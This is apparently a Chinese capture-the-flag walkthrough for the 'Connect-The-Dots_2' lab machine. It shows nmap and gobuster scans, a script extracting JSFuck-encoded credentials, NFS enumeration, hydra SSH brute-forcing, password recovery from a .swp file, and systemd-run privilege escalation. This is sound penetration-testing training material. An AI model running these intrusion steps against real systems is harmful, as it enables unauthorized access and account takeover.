Connect-The-Dots_2

Connect-The-Dots_2

一、主机发现和端口扫描

• 主机发现，靶机地址192.168.80.148

  arp-scan -l
  1

  

• 端口扫描

  nmap -A -p- -sV 192.168.80.148
  
  开放端口
  21/tcp    open  ftp      vsftpd 2.0.8 or later
  80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
  111/tcp   open  rpcbind  2-4 (RPC #100000)
  2049/tcp  open  nfs      3-4 (RPC #100003)
  7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
  33741/tcp open  nlockmgr 1-4 (RPC #100021)
  39565/tcp open  mountd   1-3 (RPC #100005)
  56517/tcp open  mountd   1-3 (RPC #100005)
  58767/tcp open  mountd   1-3 (RPC #100005)
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12

  

二、信息收集

• 访问80端口

  Happy Birthday brother!
  
  You know how our family have named us, right? Them naming me M and you N. Well, our names are entirely the same except the initials. Life is too short to save names in your memory when you're old, so why not! But do you know who did that? Our mother who was fond of the James Bond movies. She named me after her as M. Perhaps, she thinks that the director of the movie was too lazy to think of one. 
  
  I mean, who cares, right? Haha, I know you don't like me neither my pesky jokes. But I love you brother. So, don't visit this website until I am done. You'll find nothing but backups, lol.
  
  Btw, I know you love challenges so I have something in store for you as well.
  
  
  翻译
  生日快乐，兄弟!
  
  你知道我们家是怎么给我们取名的吧?他们叫我M，叫你n。嗯，我们的名字除了首字母外完全一样。生命太短暂了，当你老了的时候，为什么不把名字保存在你的记忆里呢?但你知道是谁干的吗?我们的母亲非常喜欢詹姆斯·邦德的电影。她以她的名字给我取名叫m。也许，她认为电影的导演太懒了，想不出一个名字。
  
  我是说，谁在乎呢?哈哈，我知道你不喜欢我，也不喜欢我那些讨厌的笑话。但是我爱你，兄弟。所以，在我完成之前不要访问这个网站。除了备份你什么都找不到，哈哈。
  
  顺便说一句，我知道你喜欢挑战，所以我也为你准备了一些东西。
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10
  11
  12
  13
  14
  15
  16
  17

  

• 路径扫描

  gobuster dir -u http://192.168.80.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
  
  路径
  /images               (Status: 301) [Size: 317] [--> http://192.168.80.148/images/]
  /manual               (Status: 301) [Size: 317] [--> http://192.168.80.148/manual/]
  /javascript           (Status: 301) [Size: 321] [--> http://192.168.80.148/javascript/]
  /backups              (Status: 200) [Size: 6301]
  /mysite               (Status: 301) [Size: 317] [--> http://192.168.80.148/mysite/]
  1
  2
  3
  4
  5
  6
  7
  8

  

• 访问/backups，就一个3s视频

  

• 访问/mysite，发现bootstrap.min.cs文件存在加密的东西

  

• 使用脚本将文件的字符串搞下来

  #coding=utf-8
  import requests
  import re
  
  req = requests.get("http://192.168.80.148/mysite/bootstrap.min.cs").text
  data = re.findall('\s=\s\"(.*?)\"',req)
  
  print("".join(data))
  1
  2
  3
  4
  5
  6
  7
  8

• 进行JSfuck解码

  http://www.liminba.com/tool/jsfuckdecode/
  
  alert("You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19")
  
  TryToGuessThisNorris@2k19可能是密码
  1
  2
  3
  4
  5

  

三、NFS渗透

• 因为开放了2049端口，获取 nfs 服务器的目录列列表

  showmount -e 192.168.80.148
  
  得到用户名 morris
  1
  2
  3

  

• 尝试挂载共享目录，没成功

  mount -t nfs 192.168.80.148:/home/morris dots
  1

  

四、爆破SSH

• 得到一个用户名为morris，根据主页的提示，应该还一个用户名norris，尝试ssh爆破

  用户名：
  morris
  norris
  Morris
  Norris
  
  密码：
  TryToGuessThisNorris@2k19
  
  hydra -L /tmp/user -p TryToGuessThisNorris@2k19 192.168.80.148 ssh -s 7822 -vV
  1
  2
  3
  4
  5
  6
  7
  8
  9
  10

  

• 登录ssh

  ssh norris@192.168.80.148 -p 7822
  1

  

  

五、二次信息收集

• 登录ftp下载文件

  ftp 192.168.80.148
  1

  

• 查看图片信息，发现摩斯密码

  exiftool game.jpg.bak
  
  .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
  1
  2
  3

  

• 解码

  HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.
  
  诺里斯，你已经走了这么远了。远离天堂，现在想看看地狱吗?哈哈，你肯定想我了，是吗?哦，该死的，我的电池快没电了，我找不到充电器这么快，在系统自动关闭之前在这里留下一个提示。我将地下城的入口保存在一个公开访问的“秘密文件”中。
  1
  2
  3

  

• 寻找morris密码，在/var/www/html目录下发现一个secretfile 文件

  I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.
  
  我看你是来要密码的。神圣的魔草!电池快没电了!!以下提及供参考。
  1
  2
  3

  

• 查看所有文件，发现.secretfile.swp文件，swp 是编辑器突然断电或者 ctrl+z 产生的文件

  

• 将文件下载下来，发现密码blehguessme090

  

• 登录ssh

  morris：blehguessme090
  
  ssh morris@192.168.80.148 -p 7822
  1
  2
  3

  

六、权限提升

• systemd-run提权

  systemd-run -t /bin/bash
  
  输入TryToGuessThisNorris@2k19
  1
  2
  3